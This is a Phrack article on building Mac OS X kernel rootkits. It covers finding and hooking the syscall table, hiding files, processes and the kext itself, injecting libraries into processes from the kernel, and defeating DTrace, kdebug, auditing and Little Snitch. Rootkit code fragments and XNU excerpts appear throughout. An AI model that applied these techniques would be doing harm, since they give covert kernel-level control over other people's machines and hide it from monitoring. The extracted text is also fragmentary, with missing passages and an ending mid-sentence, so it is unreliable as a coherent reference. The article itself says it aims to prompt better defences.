7
7
7
==
|=-----------------------------------------------------------------------=|
|=-------------=[ Revisiting Mac OS X Kernel Rootkits ]=-----------------=|
|=-----------------------------------------------------------------------=|
|=---------------------=[ fG! <phrack@put.as> ]=-------------------------=|
|=-----------------------------------------------------------------------=|
1 - Introduction
2 - The classic problems
2.1 - What is new since Tiger
2.2 - Sysent table discovery techniques
2.3 - Hiding the kext
2.4 - Hiding files
2.5 - Hiding processes
2.6 - Modifying the syscall handler
3 - Reading the filesystem from kernel land
3.1 - Real short overview of VFS
3.2 - The easy way - Apple loves rootkit authors!
3.3 - The more complex way
3.4 - Solving kernel symbols
4 - Executing userland binaries from the kernel
4.1 - Writing from kernel memory into userland processes
4.2 - Abusing (again!) dyld to inject and run code
4.3 - Finding the place to execute the injection
4.4 - Ideas are great, execution is everything
4.5 - The dynamic library
4.6 - Hiding our tracks
5 - Revisiting userland<->kernel communication
5.1 - Character devices and ioctl
5.2 - Kernel control KPI
5.3 - Ideas for our own alternative channels
6 - Anti-forensics
6.1 - Cheap tricks to reduce our footprint
6.2 - Attacking DTrace and other instrumentation features
6.2.1 - FSEvents
6.2.2 - kdebug
6.2.3 - TrustedBSD
6.2.4 - Auditing - Basic Security Module
6.2.5 - DTrace
6.2.5.1 - syscall provider
6.2.5.2 - fbt provider
6.3 - AV-Monster II
6.4 - Bypassing Little Snitch
6.5 - Zombie rootkits
7 - Caveats & Detection
8 - Final words
9 - References
10 - T3h l337 c0d3z
--[ 1 - Introduction
The defensive knowledge and available tools are still poor. I hope
this article motivates others to invest time and resources to improve
this scenario. It is quite certain that the offensive knowledge is
significantly ahead.
The easiest and many favourite's spot to hook the system calls is the
sysent table - just replace a pointer and we are set. Apple has been
improving the defence of that "castle" by hiding the sysent table symbol
and moving its location.
Up to Snow Leopard, Apple removed the symbol table from the kernel space
so there was no easy way to solve non-exported symbols inside the kernel
extension or I/O Kit driver. This was changed in Lion by leaving the full
__LINKEDIT segment in kernel memory but marked as pageable. Snare shows
this in one of his posts [5] and rubilyn rootkit uses it. Beware that
the formula they use has a small problem - it assumes that the symbol
table is located at the beginning of __LINKEDIT. This is true in Lion
but not in Mountain Lion.
I will show you how a solution that is stable, simple, and compatible
with all OS X versions. Too good to be true! :-)
Lets illustrate this with an example, starting with Mountain Lion 10.8.2:
- unix_syscall
- unix_syscall64
- unix_syscall_return
On page 332 there is a code snippet that searches memory for "something
that has the same structure as the sysent table.". The starting search
point is the nsysent symbol, increasing the memory pointer to lookup
and match sysent array elements.
That code snippet does not work with Snow Leopard because sysent array
is located before nsysent symbol. It must be modified to support specific
versions and releases.
The second technique can be adapted to cover all cases. First we would
scan memory addresses above nsysent and then below if initial search
failed. If nsysent also stops being exported we would need to base the
search in another symbol and continue the cat & mouse game.
Once we have the interrupt 80 handler address we can find out the
base address of the kernel. Kernel ASLR does not matter here because
the handler address is always a valid kernel code location - we are
dynamically querying the system and not using fixed addresses. To find
the kernel base address is just a matter of searching memory back for
the magic value of the Mach-O header - 0xfeedfacf (64 bits) or 0xfeedface
(32 bits).
The next step is to process the Mach-O headers and find out where the
__DATA segment is located. The reason for this is that the sysent table
is located in there - we need to extract segment's start address and
boundaries. Now it is just a matter of searching memory for something
that matches the sysent table.
Are there any performance problems doing things like this? The sysent
location is found in less than a second even on a 5 year old Core 2 Duo
Macbook Pro. The performance impact can be considered meaningless.
This method was applied successfully when the first Mountain Lion
developer preview became available and still works up to 10.8.2.
You can find its implementation in the included source code at the end.
A userland version that uses /dev/kmem to extract the same information
is available at [9].
What is the difference against using any other exported symbol instead
of all the trouble with the interrupt handler? Honestly, it is just a
matter of personal preference and technical "prowess". A symbol that
breaks compatibility if removed could be used instead with very low risk
of Apple changing it. Later, we will need to use at least one KPI so
almost any symbol from it can be used as search's starting point.
One way to get its value in 64 bits is the following (ripped from XNU):
#define rdmsr(msr,lo,hi) \
__asm__ volatile("rdmsr" : "=a" (lo), "=d" (hi) : "c" (msr))
IORecursiveLockLock(sKextLock);
Testing this approach I was able to find the method referenced above with
a precision of 100% or 50%. The different rates depend on how strict are
the search parameters due to some differences between compiler output in
kernel versions. I'm talking about the number of calls, jmps, jnz, jae,
which have small variations between some versions (compiler upgrades,
settings, etc). The performance is amazing - it takes 1 second to
disassemble and search the whole kernel using a high-end Intel i7 cpu.
struct direntry {
__uint64_t d_ino; /* file number of entry */
__uint64_t d_seekoff; /* seek offset (optional, used by servers) */
__uint16_t d_reclen; /* length of this record */
__uint16_t d_namlen; /* length of string in d_name */
__uint8_t d_type; /* file type, see below */
char d_name[__DARWIN_MAXPATHLEN]; /*entry name (up to MAXPATHLEN bytes)*/
}
The match is done against the field d_name, which only contains the
current file or folder without the full path. This is the reason why
most implementations only match the file anywhere in the filesystem.
Luckily for us, all syscalls functions prototypes contain the proc
structure as the first parameter. It contains enough information to
match the full pathname.
struct proc {
(...)
struct filedesc *p_fd; /* Ptr to open files structure. */
(...)
}
struct filedesc {
struct fileproc **fd_ofiles; /* file structures for open files */
char *fd_ofileflags; /* per-process open file flags */
struct vnode *fd_cdir; /* current directory */
struct vnode *fd_rdir; /* root directory */
int fd_nfiles; /* number of open files allocated */
int fd_lastfile; /* high-water mark of fd_ofiles */
(...)
};
The files listed by this function are not the files we want to hide but
the files opened by the binary calling this syscall. This information
can be used, for example, to find the path that a "ls" command is trying
to list. The full path can be extracted manually by iterating over the
vnodes of each file, or by using a KPI function (vn_getpath).
To build the path from vnodes, first we retrieve the vnode structure
correspondent to the file and then iterate over up to the filesystem
root - each vnode has a reference to its parent vnode.
struct vnode {
(...)
const char *v_name; /* name component of the vnode */
vnode_t v_parent; /* pointer to parent vnode */
(...)
}
To find the folder or file being listed we can use the following trick,
which seems to hold true:
The only word of caution is when shell expansion is involved. In this case
last file entry name will be a "ttys" and we need to iterate fd_ofiles
array looking for the previous element to "ttys" - it is not lastfile-1.
/*!
@function vn_getpath
@abstract Construct the path to a vnode.
@discussion Paths to vnodes are not always straightforward: a file with
multiple hard-links will have multiple pathnames, and it is sometimes
impossible to determine a vnode's full path. vn_getpath() will not enter
the filesystem.
@param vp The vnode whose path to obtain.
@param pathbuf Destination for pathname; should be of size MAXPATHLEN
@param len Destination for length of resulting path string. Result will
include NULL-terminator in count--that is, "len"
will be strlen(pathbuf) + 1.
@return 0 for success or an error code.
*/
int vn_getpath(struct vnode *vp, char *pathbuf, int *len);
We still need to retrieve a vnode from the proc structure to use this
function. To find the vnode we can use the lastfile trick to find the
target path, retrieve its vnode and then use this function to get the
full path.
A better solution is to hide your data inside other data files that
can't be easily checksum'ed. Sqlite3 databases come to my mind [35].
The traditional way to hide processes is to remove them from the process
list maintained by the kernel. When an application requests the process
list, the rootkit intercepts and modifies the request. In this case,
only the results are modified and the underlying structures are still
intact. A rootkit detection tool can access those structures and compare
with the results.
Another possibility is to remove the processes from the process list. This
time a tool that is based on those structures information will not be
able to detect the inconsistency because there is none (regarding only
the proc list, because there is data in other structures that can be
used to signal inconsistencies).
Due to OS X design, things are a bit more fun (or complicated) because
the BSD layer runs on top of XNU layer. The basic process units are Mach
tasks and threads and there's a one-on-one mapping between BSD processes
and Mach tasks. The task is just a container and Mach threads are the
units that execute code. What matters for this case is that there is
an additional list where inconsistencies can be detected - the Mach
tasks list. Using an ascii version of nofate's diagram found at [3]:
Each BSD process has reference to the Mach tasks list via a void pointer
and vice-versa. Transversing both lists can detect the inconsistency
described above and most certainly flag an installed rootkit (it is
possible to have a Mach task without a corresponding BSD process).
struct proc {
(...)
void *task; /* corresponding task (static) */
(...)
}
struct task {
(...)
void *bsd_info; /* the corresponding proc_t */
(...)
}
The (not so new) lesson to extract from this is that there many points to
be used for detecting inconsistencies in the system. These are hard to
hide if the goal is to hide one or more rogue processes. A much better
solution is to piggyback into normal processes, where detection is a
bit harder - it can be a normal process with an extra thread running
for example. The piggyback solution will be used later to run userland
commands from the kernel.
USER_TRAP_SPC(0x80,idt64_unix_scall)
(...)
code = regs->rax & SYSCALL_NUMBER_MASK;
DEBUG_KPRINT_SYSCALL_UNIX(
"unix_syscall64: code=%d(%s) rip=%llx\n",
code, syscallnames[code >= NUM_SYSENT ? 63 : code], regs->isf.rip);
callp = (code >= NUM_SYSENT) ? &sysent[63] : &sysent[code];
uargp = (void *)(®s->rdi);
(...)
AUDIT_SYSCALL_ENTER(code, p, uthread);
error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
AUDIT_SYSCALL_EXIT(code, p, uthread, error);
(...)
loc_FFFFFF80005E169C:
4C 03 2D 2D EA 21 00 add r13, cs:sysent
4C 3B 2D 26 EA 21 00 cmp r13, cs:sysent
74 0B jz short loc_FFFFFF80005E16B7
Another way is to modify the code reference to __got section and instead
point it to somewhere else. This is very easy to implement with diStorm's
assistance.
One way to make this safer is to put the pointer in kernel's memory
space. This can be alignment space, Mach-O header (for the lulz!), or
somewhere else (it is just a data pointer so no need for exec permission).
Now let's get going with the fun stuff that opens the door to even
funnier stuff!
Possible solutions are to solve the symbols from userland, and pattern
search from the kext - this one easily susceptible to failure due to
changing patterns in kernel versions and compilers.
Two methods will be shown, one very easy based on exported symbols (and
a copy of a very stable private extern kernel function), and another a
bit more complex that requires some unexported symbols. Both are based in
VFS - the obvious and easiest way to achieve our goal. Other functions
can be used so many variations are possible. That is left open for you
to explore, I still have a lot to write about in this paper :-)
The first piece of information that we need is the vnode of the target
file we want to read. We already seen in section 2.4 that this information
is available in proc_t structure but we can follow an easier path!
/*!
@function vnode_lookup
@abstract Convert a path into a vnode.
@discussion This routine is a thin wrapper around xnu-internal lookup
routines; if successful, it returns with an iocount held on the resulting
vnode which must be dropped with vnode_put().
@param path Path to look up.
@param flags VNODE_LOOKUP_NOFOLLOW: do not follow symbolic links.
VNODE_LOOKUP_NOCROSSMOUNT: do not cross mount points.
@return Results 0 for success or an error code.
*/
errno_t vnode_lookup(const char *, int, vnode_t *, vfs_context_t);
The arguments are the path for the target file, search flags, a vnode_t
pointer for output and the vfs context for the current thread (or kernel
context).
errno_t
vnode_lookup(const char *path, int flags, vnode_t *vpp, vfs_context_t ctx)
{
struct nameidata nd;
int error;
u_int32_t ndflags = 0;
#include <sys/vnode.h>
int error = 0;
vnode_t kernel_vnode = NULLVP;
error = vnode_lookup("/mach_kernel", 0, &kernel_vnode, NULL);
Having kernel's vnode information we can finally read its contents from
the rootkit. To do that we can use the VNOP_READ() function - documented
and declared at bsd/sys/vnode_if.h.
/*!
@function VNOP_READ
@abstract Call down to a filesystem to read file data.
@discussion VNOP_READ() is where the hard work of of the read() system
call happens. The filesystem may use the buffer cache, the cluster layer,
or an alternative method to get its data; uio routines will be used to see
that data is copied to the correct virtual address in the correct address
space and will update its uio argument to indicate how much data has been
moved.
@param vp The vnode to read from.
@param uio Description of request, including file offset, amount of data
requested, destination address for data, and whether that destination is in
kernel or user space.
@param ctx Context against which to authenticate read request.
@return 0 for success or a filesystem-specific error. VNOP_READ() can
return success even if less data was read than originally requested;
returning an error value should indicate that something actually went
wrong.
*/
extern errno_t VNOP_READ(vnode_t, struct uio *, int, vfs_context_t);
Two are available in BSD KPIs - uio_create and uio_addiov. The other
one, uio_createwithbuffer is private extern and used by uio_create. We
can rip its implementation into our rootkit code from XNU source file
bsd/kern/kern_subr.c. It's simple and stable enough to make this possible
(never modified in all latest OS X versions).
Once again we can pass NULL to the ctx argument - the implementation takes
care of it for us as in vnode_lookup().
char data_buffer[PAGE_SIZE_64];
uio_t uio = NULL;
uio = uio_create(1, 0, UIO_SYSSPACE, UIO_READ);
error = uio_addiov(uio, CAST_USER_ADDR_T(data_buffer), PAGE_SIZE_64);
char data_buffer[PAGE_SIZE_64];
uio_t uio = NULL;
char uio_buf[UIO_SIZEOF(1)];
uio = uio_createwithbuffer(1, 0, UIO_SYSSPACE, UIO_READ, &uio_buf[0],
sizeof(uio_buf));
error = uio_addiov(uio, CAST_USER_ADDR_T(data_buffer), PAGE_SIZE_64);
First create the uio buffer, and then add it else it can't be used.
The data buffer can be a statically allocated buffer (as above) or
dynamically allocated using _MALLOC() or other available kernel variant.
Having the uio buffer created the last step is to execute the read:
If successful, the buffer will contain the first page (4096 bytes) of
/mach_kernel OS X kernel read into data_buffer.
This second approach was in fact how I started to explore this problem
and before I learnt about vnode_lookup(). It is a good backup method
but the learning experience and some techniques used to obtain some
information are the interesting bits here.
/*!
@function VNOP_LOOKUP
@abstract Call down to a filesystem to look for a directory entry by name.
@discussion VNOP_LOOKUP is the key pathway through which VFS asks a
filesystem to find a file. The vnode should be returned with an iocount to
be dropped by the caller. A VNOP_LOOKUP() calldown can come without a
preceding VNOP_OPEN().
@param dvp Directory in which to look up file.
@param vpp Destination for found vnode.
@param cnp Structure describing filename to find, reason for lookup, and
various other data.
@param ctx Context against which to authenticate lookup request.
@return 0 for success or a filesystem-specific error.
*/
#ifdef XNU_KERNEL_PRIVATE
extern errno_t VNOP_LOOKUP(vnode_t, vnode_t *, struct componentname *,
vfs_context_t);
#endif /* XNU_KERNEL_PRIVATE */
The first argument is the vnode of the directory where the target file
is located. It is a kind of a chicken and egg problem because we do not
have that information - we want it! Do not fear, this information can
be extracted from somewhere else. As previously described, the proc
structure contains the field p_fd - pointer to open files structure
(struct filedesc).
The filedesc structure has two interesting fields for our purposes:
There is also fd_rdir, which is the vnode of root directory but from my
tests it is usually NULL.
The proposed procedure is to traverse the proc structure and find pid 0
(field p_pid). When found, the field fd_cdir will contain what we need -
the vnode for the root directory.
Next problem: how to access the proc structure. There is a symbol called
allproc that contains a pointer to it but it is not exported anymore. We
need an alternative way! Two solutions: complicated and straightforward.
The kernel does not keep /mach_kernel open so the field fd_ofiles is
not useful. Luckly for us the fd_cdir is populated with the information
we need - vnode of root directory /.
The kernel knowledgeable reader knows there is no need for all this
mess to retrieve a proc_t structure. There is a BSD KPI function that
solves the problem with a single call, proc_find(). Its prototype is:
proc_t proc_find(int pid)
Once again we need a vfs context and this time we need to supply it. While
researching I used a hardcoded function pointer to vfs_context_current()
but there is a better function that I found out while writing this
section. It is vfs_context_create(), available in BSD KPI.
/*!
@function vfs_context_create
@abstract Create a new vfs_context_t with appropriate references held.
@discussion The context must be released with vfs_context_rele() when no
longer in use.
@param ctx Context to copy, or NULL to use information from running
thread.
@return The new context, or NULL in the event of failure.
*/
vfs_context_t vfs_context_create(vfs_context_t);
struct componentname {
// Arguments to lookup.
uint32_t cn_nameiop; /* lookup operation */
uint32_t cn_flags; /* flags (see below) */
void *cn_reserved1; /* use vfs_context_t */
void *cn_reserved2; /* use vfs_context_t */
// Shared between lookup and commit routines.
char *cn_pnbuf; /* pathname buffer */
int cn_pnlen; /* length of allocated buffer */
char *cn_nameptr; /* pointer to looked up name */
int cn_namelen; /* length of looked up component */
uint32_t cn_hash; /* hash value of looked up name */
uint32_t cn_consume; /* chars to consume in lookup() */
};
cnp.cn_nameiop = LOOKUP;
cnp.cn_flags = ISLASTCN;
cnp.cn_reserved1 = vfs_context_create(NULL);
cnp.cn_pnbuf = tmpname;
cnp.cn_pnlen = sizeof(tmpname);
cnp.cn_nameptr = cnp.cn_pnbuf;
cnp.cn_namelen = (int)strlen(tmpname); // <- add NULL ?
Now we are ready to call VNOP_LOOKUP() and use the returned vnode
information to execute VNOP_READ() as in section 3.1 (do not forget to
create first the UIO buffer).
Last but not least, there is another function we can (ab)use to read files
- vn_rdwr(). It was this function that triggered my curiosity about this
process while reading about the execution flow of a Mach-O binary. The
parameters it requires can be retrieved or created with the techniques
above described or others you might come up with. Feel free to implement
it and discover alternative ways to read the files (there are more!).
Writing is not harder than reading. Just browse the source files mentioned
in this section and the functions you need will be obvious. You can
apply the techniques here described to fill the required parameters.
----[ 3.4 - Solving kernel symbols
Snare on his blog post [5] explains in detail how to solve the kernel
symbols. The only difference is that instead of reading directly from
kernel memory we have the information in temporary buffers with data
read from the filesystem.
1) Read the first page of /mach_kernel, which contains the Mach-O header.
2) Process the Mach-O header and retrieve the following information:
- From __TEXT segment: vmaddr field (for ASLR slide computation).
- From __LINKEDIT segment: fileoff and filesize (so we can read the
segment).
- From LC_SYMTAB command: symoff, nsyms, stroff, strsize.
Refer to [10] for more information about Mach-O file format.
3) Allocate buffer and read the whole __LINKEDIT segment.
4) Solve any required symbol by processing the __LINKEDIT buffer using the
LC_SYMTAB collected information (offsets to symbol and string tables).
5) Do not forget to add the kernel ASLR slide to the addresses. Slide can
be computed by the difference between running __TEXT vmaddr and the one
read from disk.
There is no need to read the whole mach_kernel file into kernel space,
we just need the headers and __LINKEDIT segment, around 1MB, smaller
than the 7.8MB of Mountain Lion 10.8.2 full kernel. Kernel memory is at
a premium :-)
We need another solution and I will present not one but two, both easy
to use. Thanks go to snare for giving me some initial sample code from
his own research.
The vm_map_copyout() function copies the object into the target map,
aka, our target process. We need the vm_map_t info for kernel and target
process - both can be found by iterating proc list or proc_find(),
as previously described.
kr = vm_map_copyin(kernel_task->map, (vm_map_address_t)fname,
strlen(fname)+1, FALSE, ©);
kr = vm_map_copyout(task->map, &dst_addr, copy);
dst_addr will contain the value 0x11fa000 (target was a 32 bits process).
Dumping the process memory:
0x11fa000 6e 65 6d 6f 5f 61 6e 64 5f 73 6e 61 72 65 5f 72 nemo_and_snare_r
0x11fa010 75 6c 65 21 00 00 00 00 00 00 00 00 00 00 00 00 ule!............
At this point we need to copy the contents to the target address we
want to. This can be achieved using mach_vm_copy() - a function that
copies one memory region to another within the same task. The address
where the data was copied to can be found at the second parameter of
vm_map_copyout().
vm_map_copy_t copy;
char *fname = "nemo_and_snare_rule!";
vm_map_address_t dst_addr;
// copy the object to userland, this will allocate a new space into target
// map
kr = vm_map_copyout((vm_map_t)task->map, &dst_addr, copy);
printf("wrote to userland address 0x%llx\n", CAST_USER_ADDR_T(dst_addr));
// and now we can use mach_vm_copy() because it copies data within the same
// task
kr = mach_vm_copy((vm_map_t)task->map, CAST_USER_ADDR_T(dst_addr),
strlen(fname)+1, 0x1000);
// release references created with proc_find() - must be always done!
proc_rele(p);
proc_rele(p_kernel);
/*
* vm_map_remove:
* Remove the given address range from the target map.
* This is the exported form of vm_map_delete.
*/
extern kern_return_t
vm_map_remove(vm_map_t map,
vm_map_offset_t start,
vm_map_offset_t end,
boolean_t flags);
An easy alternative is to just zero those bytes and assume that space
as a small memory leak. It works and it is not a big deal.
The second solution requires a single function and has no
memory allocation at the target process. We are talking about
vm_map_write_user(): "Copy out data from a kernel space into space in
the destination map. The space must already exist in the destination map."
The prototype:
kern_return_t
vm_map_write_user(vm_map_t map, void *src_p, vm_map_address_t dst_addr,
vm_size_t size);
Where map is the vm_map_t of the target process, and src_p the kernel data
buffer we want to write to the process. The previous example using this
function:
struct proc *p = proc_find(PID);
struct task *task = (struct task*)(p->task);
kern_return_t kr = 0;
vm_prot_t new_protection = VM_PROT_WRITE | VM_PROT_READ;
char *fname = "nemo_and_snare_rule!";
// modify memory permissions
kr = mach_vm_protect(task->map, 0x1000, len, FALSE, new_protection);
kr = vm_map_write_user(task->map, fname, 0x1000, strlen(fname)+1);
proc_rele(p);
This alternative is easier and does not allocate new memory at the target.
Do not forget to restore the original memory permissions.
After so many words you are probably asking why not use copyout to copy
from kernel to userland? Well, of course it is possible but there is
a problem. It can't be used to overwrite to arbitrary processes - only
against the current process. Even if we try to change the current map to
another process using vm_map_switch(), copyout will always retrieve the
current process so copyout will fail with EFAULT if we try an address
of another process that does not exists in current. This means that it
can be used, for example, inside a hooked syscall but not to write to
arbitrary processes.
The presentations at Secuinside [11] and HitCon [12] discuss the Mach-O
header details and injection process. This is valid for dynamically
linked executables, where execution will start at the dynamic linker
(/usr/lib/dyld) and then continue at the executable entry point.
A simplified version of the binary execution process, adapted from [13] is:
The above diagram presents many places where we can modify the new process
memory and its Mach-O header. As previously mentioned, when dyld gains
control it will parse again the Mach-O header so our modification is
guaranteed to be used if made before dyld's control.
//
// Entry point for dyld. The kernel loads dyld and jumps to __dyld_start
// which sets up some registers and call this function.
//
// Returns address of main() in target program which __dyld_start jumps to
//
uintptr_t
_main(const macho_header* mainExecutableMH, uintptr_t mainExecutableSlide,
int argc, const char* argv[], const char* envp[],
const char* apple[], uintptr_t* startGlue)
The kernel has no symbol stubs so we can't just modify a pointer and
hijack a useful function. One solution is to inline hook the function
prologue and make it jump to our function. We can simplify this by
implementing the whole original function (copy from XNU source into our
rootkit); this way we do not need to return back to the original one,
just restore the original bytes when we finish our evil work.
void
task_set_dyld_info(task_t task, mach_vm_address_t addr,
mach_vm_size_t size)
{
task_lock(task);
task->all_image_info_addr = addr;
task->all_image_info_size = size;
task_unlock(task);
}
The locks calls are nothing else than macros using a symbol available in
KPIs:
It is a great candidate - we can copy & paste its code into our
rootkit source, add our code to inject the library and then execute
the original function code. Because it is not a static function we can
find its symbol. The first parameter is a task_t structure, which has
a pointer to the correspondent proc_t structure (remember that proc and
task structures are connected to each other via void pointers).
/*
* Remember file name for accounting.
*/
p->p_acflag &= ~AFORK;
/* If the translated name isn't NULL, then we want to use
* that translated name as the name we show as the "real" name.
* Otherwise, use the name passed into exec.
*/
if (0 != imgp->ip_p_comm[0]) {
bcopy((caddr_t)imgp->ip_p_comm, (caddr_t)p->p_comm,
sizeof(p->p_comm));
} else {
if (imgp->ip_ndp->ni_cnd.cn_namelen > MAXCOMLEN)
imgp->ip_ndp->ni_cnd.cn_namelen = MAXCOMLEN;
bcopy((caddr_t)imgp->ip_ndp->ni_cnd.cn_nameptr, (caddr_t)p->p_comm,
(unsigned)imgp->ip_ndp->ni_cnd.cn_namelen);
p->p_comm[imgp->ip_ndp->ni_cnd.cn_namelen] = '\0';
}
The process name in proc_t structure is only set after the second call
to task_set_dyld_info(), so we can't use it to detect which process
is going to be executed and trigger or not our injection (remember we
are only interested in a specific process to be executed by launchd). A
workaround to this problem is to lookup the open files structure in proc_t
(p_fd field).
void proc_resetregister(proc_t p)
{
proc_lock(p);
p->p_lflag &= ~P_LREGISTER;
proc_unlock(p);
}
Start contains the lower address of the process, which is where the
Mach-O header is located at. This *appears* to hold always true (there
are good reasons to believe it!).
The header can be retrieved from the user space with vm_map_read_user()
or copyin (because here we are executing in current proc context).
After we have found the free space and the full Mach-O header is in our
buffer, we just need to add a new LC_LOAD_DYLIB command.
The two below diagrams show what needs to be done at the Mach-O header:
.-------------------.
| HEADER |<- Fix this struct:
|-------------------| struct mach_header {
| Load Commands | uint32_t magic;
| .-------------. | cpu_type_t cputype;
| | Command 1 | | cpu_subtype_t cpusubtype;
| |-------------| | uint32_t filetype;
| | Command 2 | | uint32_t ncmds; <- add +1
| |-------------| | uint32_t sizeofcmds; <- += size of new cmd
| | ... | | uint32_t flags;
| |-------------| | };
| | Command n | |
| |-------------| |
| | Command n+1 | |<- add new command here:
| `------------- | struct dylib_command {
|-------------------| uint32_t cmd;
| Data | uint32_t cmdsize;
| .---------------. | struct dylib dylib;
| | | Section 1 | | };
| | 1 |-----------| | struct dylib {
| | | Section 2 | | union lc_str name;
| `--------------- | uint32_t timestamp;
| .---------------. | uint32_t current_version;
| | | Section 1 | | uint32_t compatibility_version;
| | 2 |-----------| | };
| | | Section 2 | | union lc_str {
| `--------------- | uint32_t offset;
| ... | #ifndef __LP64__ // not used
| | char *ptr;
| | #endif
| | };
`-------------------
A diff between original and modified:
.-------------------. .-------------------.
| HEADER | | HEADER |<- Fix this struct
|-------------------| |-------------------| struct mach_header {
| Load Commands | | Load Commands | ...
| .-------------. | | .-------------. | uint32_t ncmds; <- fix
| | Command 1 | | | | Command 1 | | uint32_t sizeofcmds;<- fix
| |-------------| | | |-------------| | ...
| | Command 2 | | | | Command 2 | | };
| |-------------| | | |-------------| |
| | ... | | | | ... | |
| |-------------| | | |-------------| |
| | Command n | | | | Command n | |
| `------------- | | |-------------| |
| |---->| | Command n+1 | |<- add new command here
| |---->| `------------- | struct dylib_command {
|-------------------|---->|-------------------| uint32_t cmd;
| Data |---->| Data | uint32_t cmdsize;
| .---------------. |---->| .---------------. | struct dylib dylib;
| | | Section 1 | |---->| | | Section 1 | | };
| | 1 |-----------| | | | 1 |-----------| |
| | | Section 2 | | | | | Section 2 | |
| `--------------- | | `--------------- |
| .---------------. | | .---------------. |
| | | Section 1 | | | | | Section 1 | |
| | 2 |-----------| | | | 2 |-----------| |
| | | Section 2 | | | | | Section 2 | |
| `--------------- | | `--------------- |
| ... | | ... |
`------------------- `-------------------
There are other methods to inject the library if there is not enough
space. One that requires only 24 bytes is described at [16].
/*
* Set code-signing flags if this binary is signed, or if parent has
* requested them on exec.
*/
if (load_result.csflags & CS_VALID) {
imgp->ip_csflags |= load_result.csflags &
(CS_VALID|
CS_HARD|CS_KILL|CS_EXEC_SET_HARD|CS_EXEC_SET_KILL);
} else {
imgp->ip_csflags &= ~CS_VALID;
}
The code snippet is from exec_mach_imgact() and located well before our
two candidate functions described in section 4.3. Code signing does not
kill immediately the process. The flags are verified later and a kill
signal sent if code signing was configured to exit on failure (which we
can also modify here).
The only puzzle piece left is which process should we use and how to kill
it. There are many root processes controlled by launchd so it is just
a matter of selecting one with invisible and/or small impact. Spotlight
is for example a good candidate. A code snippet to do the killing:
The dynamic library is very easy to create if you use the Xcode template
(oh the drama, hackers use Makefiles!) or just Google for a simple
Makefile.
To execute the library code you can add an entrypoint via a constructor:
The first one is that we need to restart a target process. This will
leave an immediate clue on a (potentially very) higher PID, depending
when the method is used (near startup it is ok).
What we can do is search in the binary the calls to the symbol stub
(it is a relative offset call). Even easier (and probably faster)
is to disassemble and match the address of the call with the stub -
the disassembler will output the final address.
After we have the address where dispatch_flush_continuation_cache() is
called from we just need to find the function prologue and patch it with
a ret (function return is void so no need for xor eax,rax). We can then
restore the original byte after we execute our command. Another function,
bsd_out_message() might need to be patched, but I leave that task to you,
the reader.
Another alternative is to try to recycle the PID that was killed. The
forkproc() function is the one that allocates the new PID for the
child. Might be interesting to research and explore this alternative. You
also might want to reorder the proc list and move the new element to the
original location instead of being in newer location. Many possibilities
to hide and try to detect the rootkit actions. That is why it is fun!
The next issue is that process memory will have our injected library so
we want to remove it as soon as possible. I did some interesting work
in this area but NDA oblige and can't disclose it. It can be done and
you should think about it, or just use a brute approach and kill the
process again and this time do not inject anything. Whatever works :-)
The most interesting entrypoints for our purposes are open, close,
ioctl. If you are interested in using this communication channel, you
probably should think about encrypting it or some kind of authentication
method. OS.X/Crisis has no authentication whatsoever so anyone can send
commands to the kernel rootkit after (easily) finding all the possible
ioctl commands.
A kernel extension is responsible for creating the socket and the userland
part will read and send data to that same socket (socket access can be
restricted to privileged users or everyone).
Another important detail is about the control ID. Since the recommended
way is to use a dynamically assigned control ID, the userland client
needs somehow to retrieve it. This can be done using a ioctl request
(the reverse dns name must be shared between the kernel and userland).
The two presented solutions are easy to setup and use but also easy
to detect. Their main problem is that they leave "permanent" traces
that need to be hidden (kernel structures for example). This increases
rootkit's complexity and chances of being detected.
Covert channels are a lot more appropriate and a lot has been written
about them. Since it is so easy to use almost any kernel function, the
possibilities to be creative in this department are much higher. Data can
be stealthy read and written anywhere in the filesystem, bypassing many
detection and instrumentation mechanisms as it will be shown next. At
the limit there is no real need for a direct communication channel! For
example, data can be encoded in a binary and intercepted when it is
executed. The possibilities are really endless. This very short section
is just a reminder that rootkit design can be different from what is
usually done and that you should think about it, whether you belong to
the offensive or defensive side.
--[ 6 - Anti-forensics
Kernel extensions must have a start and stop function. Their prototype
specifies a kmod_info_t structure as first parameter. It is part of a
linked list of all loaded kernel extensions (used to hide the rootkit
from kextstat but now marked deprecated) and contains a very useful
field to apply this cheap trick.
The "address" field contains the starting address of the currently loaded
kext, including the ASLR slide (kernel and kernel extensions Mach-O header
values include the current kernel ASLR slide). With this information we
just need to find out the total size of the header and nuke it:
Function pointers can help to hide our code - the question is how easy or
not it is to bootstrap the rootkit to search the required symbols. One
solution can be to use the techniques described before to find the
symbols and then mangle the bootstrap code - only leave in memory code
using function pointers. Be creative, try to reduce your footprint to
the maximum :-).
A 32 bits integer is used for the debug messages, with the following
format:
----------------------------------------------------------------------
| | | |Func |
| Class (8) | SubClass (8) | Code (14) |Qual(2)|
----------------------------------------------------------------------
Macros exist to encode the integer for each available class. Using BSD
class as an example:
Grep'ing XNU source code for BSDDBG_CODE will show where kdebug is
implemented in all BSD related functions. The fs_usage util traces
the file system related system calls (its source is located in
system_cmds-550.10 package). For example, it contains the following
code for open() syscall:
#define DBG_BSD 4
#define DBG_BSD_EXCP_SC 0x0C /* System Calls */
Open is syscall #5 and it matches the code: (0x040C0014 & 0x3FFF) >>
2 = 0x5
(...)
KERNEL_DEBUG_CONSTANT_IST(KDEBUG_TRACE,
BSDDBG_CODE(DBG_BSD_EXCP_SC, code) | DBG_FUNC_START,
(int)(*ip), (int)(*(ip+1)), (int)(*(ip+2)),
(int)(*(ip+3)), 0);
(...)
error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
(...)
KERNEL_DEBUG_CONSTANT_IST(KDEBUG_TRACE,
BSDDBG_CODE(DBG_BSD_EXCP_SC, code) | DBG_FUNC_END,
error, uthread->uu_rval[0], uthread->uu_rval[1], p->p_pid, 0);
(...)
void
tfc_kernel_debug(uint32_t debugid, uintptr_t arg1, uintptr_t arg2,
uintptr_t arg3, uintptr_t arg4, __unused uintptr_t arg5)
{
// solve the symbol of the original function
static void (*_kernel_debug)(uint32_t debugid, uintptr_t arg1,
uintptr_t arg2, uintptr_t arg3, uintptr_t arg4,
__unused uintptr_t arg5) = NULL;
if (_kernel_debug == NULL)
_kernel_debug = (void*)solve_kernel_symbol(&g_kernel_info,
"_kernel_debug");
This patch will be suspicious when fs_usage and/or sc_usage are used
because no BSD system calls will be traced and screen output will be very
low. kdebug's implementation poses some problems to distinguish between
cases to hide or not. Its buffers are very small and this is easily
